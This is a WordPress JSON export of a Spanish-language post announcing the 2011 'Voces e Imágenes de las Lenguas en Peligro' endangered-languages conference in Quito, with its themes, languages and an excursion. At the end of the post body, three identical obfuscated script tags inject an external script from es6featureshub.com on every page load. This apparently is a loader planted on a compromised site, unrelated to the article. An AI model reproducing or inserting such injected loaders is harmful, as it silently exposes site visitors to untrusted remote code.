{"id":49122,"date":"2011-09-07T12:00:46","date_gmt":"2011-09-07T10:00:46","guid":{"rendered":"http:\/\/www.sorosoro.org\/?p=49122"},"modified":"2025-10-21T22:25:10","modified_gmt":"2025-10-21T20:25:10","slug":"7-9-de-septiembre-2011-conferencia-titulada-voces-e-imagenes-de-las-lenguas-en-peligro-en-quito-ecuador","status":"publish","type":"post","link":"https:\/\/www.sorosoro.org\/es\/2011\/09\/7-9-de-septiembre-2011-conferencia-titulada-voces-e-imagenes-de-las-lenguas-en-peligro-en-quito-ecuador\/","title":{"rendered":"7-9  de septiembre 2011: conferencia titulada \u00ab Voces e Im\u00e1genes de las Lenguas en Peligro \u00bb, en Quito (Ecuador)"},"content":{"rendered":"<p style=\"text-align: justify;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-49124\" title=\"vocesimagenes\" src=\"http:\/\/www.sorosoro.org\/wp-content\/uploads\/vocesimagenes2.jpg\" alt=\"vocesimagenes\" width=\"252\" height=\"158\" \/><\/p>\n<p style=\"text-align: justify;\">La conferencia anual de la <em>Foundation for Endangered Languages <\/em>(Fundaci\u00f3n por las lenguas en peligro) se llevar\u00e1 a cabo <strong>del 7 al 9 de septiembre<\/strong> en la facultad de Comunicaci\u00f3n, Ling\u00fc\u00edstica y Literatura de la <strong>Universidad Pontificia Cat\u00f3lica<\/strong> en Quito, <strong>Ecuador<\/strong>.<\/p>\n<p style=\"text-align: justify;\">Los organizadores comprobaron que la amenaza que pesa sobre las lenguas en peligro, que recibe m\u00e1s atenci\u00f3n desde hace varios a\u00f1os, segu\u00eda siendo considerada muy a menudo de inter\u00e9s \u00fanicamente para los hablantes de estas lenguas. Se quiso pues derribar este postulado considerando el <strong>impacto de las lenguas minoritarias<\/strong> sobre las sociedades que los rodean, ya sea por sus reivindicaciones o por la imagen que dan de ellas mismas por fuera.<\/p>\n<p style=\"text-align: justify;\">Esta conferencia titulada \u00ab <em><strong>Voces e Im\u00e1genes de las Lenguas en Peligro<\/strong><\/em> \u00bb, considerar\u00e1 por consiguiente los puntos de vista nacidos de las comunidades mismas (c\u00f3mo se protegieron, se transformaron, o c\u00f3mo perdieron al contrario sus lenguas y sus tradiciones, c\u00f3mo utilizaron t\u00e9cnicas venidas del exterior para su documentaci\u00f3n, cuales alianzas pasaron etc.) as\u00ed como los puntos de vista ex\u00f3genos (cu\u00e1l es la visi\u00f3n de las personas exteriores sobre estas comunidades ling\u00fc\u00edsticas, cual apreciaci\u00f3n, positiva o negativa, c\u00f3mo evolucionaron las actitudes frente a las lenguas en peligro, cual es el impacto de los medios de comunicaci\u00f3n etc.).<\/p>\n<p style=\"text-align: justify;\">Estos d\u00edas ser\u00e1n adem\u00e1s la ocasi\u00f3n de compartir experiencias acertadas de revitalizaci\u00f3n ling\u00fc\u00edstica.<\/p>\n<p style=\"text-align: justify;\">Las comunicaciones se har\u00e1n en una de 4 lenguas oficiales retenidas: <strong>espa\u00f1ol, ingl\u00e9s, quechua y shuar.<\/strong><\/p>\n<p style=\"text-align: justify;\">Finalmente una excursi\u00f3n en <strong>Otavalo<\/strong> est\u00e1 prevista el 10 de septiembre, visitando un mercado local, lagos, una cascada sagrada, un parque con c\u00f3ndores y m\u00fasicos.<\/p>\n<p style=\"text-align: justify;\"><strong>Ecuador<\/strong>, siendo uno de los pa\u00edses m\u00e1s peque\u00f1os de Am\u00e9rica Latina, es conocido por su diversidad geogr\u00e1fica, cultural y ling\u00fc\u00edstica. Los movimientos ind\u00edgenas de las \u00faltimas d\u00e9cadas, sus peticiones repetidas para el respeto de sus derechos econ\u00f3micos, sociales y culturales, condujeron a cambios profundos, hasta convertirse en modelos para otros pa\u00edses de la regi\u00f3n.<\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\"><a href=\"http:\/\/www.ogmios.org\/conferences\/2011\/index-es.htm\" target=\"_blank\">Para saber m\u00e1s<\/a><\/p>\n<p style=\"text-align: justify;\">Contacto: <a href=\"mailto:endangeredlanguages2011@gmail.com\">Dr. Marleen Haboud<\/a><\/p>\n<p style=\"text-align: justify;\">Tel.: +593 2 2991700<\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\"><em><strong>Voces e Im\u00e1genes de las Lenguas en Peligro<\/strong><\/em><\/p>\n<p style=\"text-align: justify;\"><em>7-9 de septiembre de 2011<\/em><\/p>\n<p style=\"text-align: justify;\"><em>Facultad de Comunicaci\u00f3n, Ling\u00fc\u00edstica y Literatura<\/em><\/p>\n<p style=\"text-align: justify;\"><em>Pontificia Universidad Cat\u00f3lica<\/em><\/p>\n<p style=\"text-align: justify;\"><em>Quito<\/em><\/p>\n<p style=\"text-align: justify;\"><em>Ecuador<\/em><\/p>\n<p><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>La conferencia anual de la Foundation for Endangered Languages (Fundaci\u00f3n por las lenguas en peligro) se llevar\u00e1 a cabo del 7 al 9 de septiembre en la facultad de Comunicaci\u00f3n, Ling\u00fc\u00edstica y Literatura de la Universidad Pontificia Cat\u00f3lica en Quito, Ecuador. Los organizadores comprobaron que la amenaza que pesa sobre las lenguas en peligro, que [&hellip;]<\/p>\n","protected":false},"author":18,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[10],"tags":[],"class_list":["post-49122","post","type-post","status-publish","format-standard","hentry","category-calendario"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>7-9 de septiembre 2011: conferencia titulada \u00ab Voces e Im\u00e1genes de las Lenguas en Peligro \u00bb, en Quito (Ecuador) - Sorosoro<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.sorosoro.org\/es\/2011\/09\/7-9-de-septiembre-2011-conferencia-titulada-voces-e-imagenes-de-las-lenguas-en-peligro-en-quito-ecuador\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"7-9 de septiembre 2011: conferencia titulada \u00ab Voces e Im\u00e1genes de las Lenguas en Peligro \u00bb, en Quito (Ecuador) - Sorosoro\" \/>\n<meta property=\"og:description\" content=\"La conferencia anual de la Foundation for Endangered Languages (Fundaci\u00f3n por las lenguas en peligro) se llevar\u00e1 a cabo del 7 al 9 de septiembre en la facultad de Comunicaci\u00f3n, Ling\u00fc\u00edstica y Literatura de la Universidad Pontificia Cat\u00f3lica en Quito, Ecuador. Los organizadores comprobaron que la amenaza que pesa sobre las lenguas en peligro, que [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.sorosoro.org\/es\/2011\/09\/7-9-de-septiembre-2011-conferencia-titulada-voces-e-imagenes-de-las-lenguas-en-peligro-en-quito-ecuador\/\" \/>\n<meta property=\"og:site_name\" content=\"Sorosoro\" \/>\n<meta property=\"article:published_time\" content=\"2011-09-07T10:00:46+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T20:25:10+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/www.sorosoro.org\/wp-content\/uploads\/vocesimagenes2.jpg\" \/>\n<meta name=\"author\" content=\"Michel.Lemee\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Michel.Lemee\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/09\/7-9-de-septiembre-2011-conferencia-titulada-voces-e-imagenes-de-las-lenguas-en-peligro-en-quito-ecuador\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/09\/7-9-de-septiembre-2011-conferencia-titulada-voces-e-imagenes-de-las-lenguas-en-peligro-en-quito-ecuador\/\"},\"author\":{\"name\":\"Michel.Lemee\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18\"},\"headline\":\"7-9 de septiembre 2011: conferencia titulada \u00ab Voces e Im\u00e1genes de las Lenguas en Peligro \u00bb, en Quito (Ecuador)\",\"datePublished\":\"2011-09-07T10:00:46+00:00\",\"dateModified\":\"2025-10-21T20:25:10+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/09\/7-9-de-septiembre-2011-conferencia-titulada-voces-e-imagenes-de-las-lenguas-en-peligro-en-quito-ecuador\/\"},\"wordCount\":409,\"image\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/09\/7-9-de-septiembre-2011-conferencia-titulada-voces-e-imagenes-de-las-lenguas-en-peligro-en-quito-ecuador\/#primaryimage\"},\"thumbnailUrl\":\"http:\/\/www.sorosoro.org\/wp-content\/uploads\/vocesimagenes2.jpg\",\"articleSection\":[\"Calendario\"],\"inLanguage\":\"es\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/09\/7-9-de-septiembre-2011-conferencia-titulada-voces-e-imagenes-de-las-lenguas-en-peligro-en-quito-ecuador\/\",\"url\":\"https:\/\/www.sorosoro.org\/es\/2011\/09\/7-9-de-septiembre-2011-conferencia-titulada-voces-e-imagenes-de-las-lenguas-en-peligro-en-quito-ecuador\/\",\"name\":\"7-9 de septiembre 2011: conferencia titulada \u00ab Voces e Im\u00e1genes de las Lenguas en Peligro \u00bb, en Quito (Ecuador) - Sorosoro\",\"isPartOf\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/09\/7-9-de-septiembre-2011-conferencia-titulada-voces-e-imagenes-de-las-lenguas-en-peligro-en-quito-ecuador\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/09\/7-9-de-septiembre-2011-conferencia-titulada-voces-e-imagenes-de-las-lenguas-en-peligro-en-quito-ecuador\/#primaryimage\"},\"thumbnailUrl\":\"http:\/\/www.sorosoro.org\/wp-content\/uploads\/vocesimagenes2.jpg\",\"datePublished\":\"2011-09-07T10:00:46+00:00\",\"dateModified\":\"2025-10-21T20:25:10+00:00\",\"author\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/09\/7-9-de-septiembre-2011-conferencia-titulada-voces-e-imagenes-de-las-lenguas-en-peligro-en-quito-ecuador\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.sorosoro.org\/es\/2011\/09\/7-9-de-septiembre-2011-conferencia-titulada-voces-e-imagenes-de-las-lenguas-en-peligro-en-quito-ecuador\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/09\/7-9-de-septiembre-2011-conferencia-titulada-voces-e-imagenes-de-las-lenguas-en-peligro-en-quito-ecuador\/#primaryimage\",\"url\":\"http:\/\/www.sorosoro.org\/wp-content\/uploads\/vocesimagenes2.jpg\",\"contentUrl\":\"http:\/\/www.sorosoro.org\/wp-content\/uploads\/vocesimagenes2.jpg\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/09\/7-9-de-septiembre-2011-conferencia-titulada-voces-e-imagenes-de-las-lenguas-en-peligro-en-quito-ecuador\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/www.sorosoro.org\/es\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"7-9 de septiembre 2011: conferencia titulada \u00ab Voces e Im\u00e1genes de las Lenguas en Peligro \u00bb, en Quito (Ecuador)\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/#website\",\"url\":\"https:\/\/www.sorosoro.org\/es\/\",\"name\":\"Sorosoro\",\"description\":\"Pour que vivent les langues du monde !\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.sorosoro.org\/es\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18\",\"name\":\"Michel.Lemee\",\"url\":\"https:\/\/www.sorosoro.org\/es\/author\/michel-lemee\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"7-9 de septiembre 2011: conferencia titulada \u00ab Voces e Im\u00e1genes de las Lenguas en Peligro \u00bb, en Quito (Ecuador) - Sorosoro","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.sorosoro.org\/es\/2011\/09\/7-9-de-septiembre-2011-conferencia-titulada-voces-e-imagenes-de-las-lenguas-en-peligro-en-quito-ecuador\/","og_locale":"es_ES","og_type":"article","og_title":"7-9 de septiembre 2011: conferencia titulada \u00ab Voces e Im\u00e1genes de las Lenguas en Peligro \u00bb, en Quito (Ecuador) - Sorosoro","og_description":"La conferencia anual de la Foundation for Endangered Languages (Fundaci\u00f3n por las lenguas en peligro) se llevar\u00e1 a cabo del 7 al 9 de septiembre en la facultad de Comunicaci\u00f3n, Ling\u00fc\u00edstica y Literatura de la Universidad Pontificia Cat\u00f3lica en Quito, Ecuador. Los organizadores comprobaron que la amenaza que pesa sobre las lenguas en peligro, que [&hellip;]","og_url":"https:\/\/www.sorosoro.org\/es\/2011\/09\/7-9-de-septiembre-2011-conferencia-titulada-voces-e-imagenes-de-las-lenguas-en-peligro-en-quito-ecuador\/","og_site_name":"Sorosoro","article_published_time":"2011-09-07T10:00:46+00:00","article_modified_time":"2025-10-21T20:25:10+00:00","og_image":[{"url":"http:\/\/www.sorosoro.org\/wp-content\/uploads\/vocesimagenes2.jpg","type":"","width":"","height":""}],"author":"Michel.Lemee","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"Michel.Lemee","Tiempo de lectura":"2 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.sorosoro.org\/es\/2011\/09\/7-9-de-septiembre-2011-conferencia-titulada-voces-e-imagenes-de-las-lenguas-en-peligro-en-quito-ecuador\/#article","isPartOf":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/09\/7-9-de-septiembre-2011-conferencia-titulada-voces-e-imagenes-de-las-lenguas-en-peligro-en-quito-ecuador\/"},"author":{"name":"Michel.Lemee","@id":"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18"},"headline":"7-9 de septiembre 2011: conferencia titulada \u00ab Voces e Im\u00e1genes de las Lenguas en Peligro \u00bb, en Quito (Ecuador)","datePublished":"2011-09-07T10:00:46+00:00","dateModified":"2025-10-21T20:25:10+00:00","mainEntityOfPage":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/09\/7-9-de-septiembre-2011-conferencia-titulada-voces-e-imagenes-de-las-lenguas-en-peligro-en-quito-ecuador\/"},"wordCount":409,"image":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/09\/7-9-de-septiembre-2011-conferencia-titulada-voces-e-imagenes-de-las-lenguas-en-peligro-en-quito-ecuador\/#primaryimage"},"thumbnailUrl":"http:\/\/www.sorosoro.org\/wp-content\/uploads\/vocesimagenes2.jpg","articleSection":["Calendario"],"inLanguage":"es"},{"@type":"WebPage","@id":"https:\/\/www.sorosoro.org\/es\/2011\/09\/7-9-de-septiembre-2011-conferencia-titulada-voces-e-imagenes-de-las-lenguas-en-peligro-en-quito-ecuador\/","url":"https:\/\/www.sorosoro.org\/es\/2011\/09\/7-9-de-septiembre-2011-conferencia-titulada-voces-e-imagenes-de-las-lenguas-en-peligro-en-quito-ecuador\/","name":"7-9 de septiembre 2011: conferencia titulada \u00ab Voces e Im\u00e1genes de las Lenguas en Peligro \u00bb, en Quito (Ecuador) - Sorosoro","isPartOf":{"@id":"https:\/\/www.sorosoro.org\/es\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/09\/7-9-de-septiembre-2011-conferencia-titulada-voces-e-imagenes-de-las-lenguas-en-peligro-en-quito-ecuador\/#primaryimage"},"image":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/09\/7-9-de-septiembre-2011-conferencia-titulada-voces-e-imagenes-de-las-lenguas-en-peligro-en-quito-ecuador\/#primaryimage"},"thumbnailUrl":"http:\/\/www.sorosoro.org\/wp-content\/uploads\/vocesimagenes2.jpg","datePublished":"2011-09-07T10:00:46+00:00","dateModified":"2025-10-21T20:25:10+00:00","author":{"@id":"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18"},"breadcrumb":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/09\/7-9-de-septiembre-2011-conferencia-titulada-voces-e-imagenes-de-las-lenguas-en-peligro-en-quito-ecuador\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.sorosoro.org\/es\/2011\/09\/7-9-de-septiembre-2011-conferencia-titulada-voces-e-imagenes-de-las-lenguas-en-peligro-en-quito-ecuador\/"]}]},{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/www.sorosoro.org\/es\/2011\/09\/7-9-de-septiembre-2011-conferencia-titulada-voces-e-imagenes-de-las-lenguas-en-peligro-en-quito-ecuador\/#primaryimage","url":"http:\/\/www.sorosoro.org\/wp-content\/uploads\/vocesimagenes2.jpg","contentUrl":"http:\/\/www.sorosoro.org\/wp-content\/uploads\/vocesimagenes2.jpg"},{"@type":"BreadcrumbList","@id":"https:\/\/www.sorosoro.org\/es\/2011\/09\/7-9-de-septiembre-2011-conferencia-titulada-voces-e-imagenes-de-las-lenguas-en-peligro-en-quito-ecuador\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.sorosoro.org\/es\/"},{"@type":"ListItem","position":2,"name":"7-9 de septiembre 2011: conferencia titulada \u00ab Voces e Im\u00e1genes de las Lenguas en Peligro \u00bb, en Quito (Ecuador)"}]},{"@type":"WebSite","@id":"https:\/\/www.sorosoro.org\/es\/#website","url":"https:\/\/www.sorosoro.org\/es\/","name":"Sorosoro","description":"Pour que vivent les langues du monde !","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.sorosoro.org\/es\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Person","@id":"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18","name":"Michel.Lemee","url":"https:\/\/www.sorosoro.org\/es\/author\/michel-lemee\/"}]}},"_links":{"self":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/posts\/49122","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/users\/18"}],"replies":[{"embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/comments?post=49122"}],"version-history":[{"count":0,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/posts\/49122\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/media?parent=49122"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/categories?post=49122"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/tags?post=49122"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}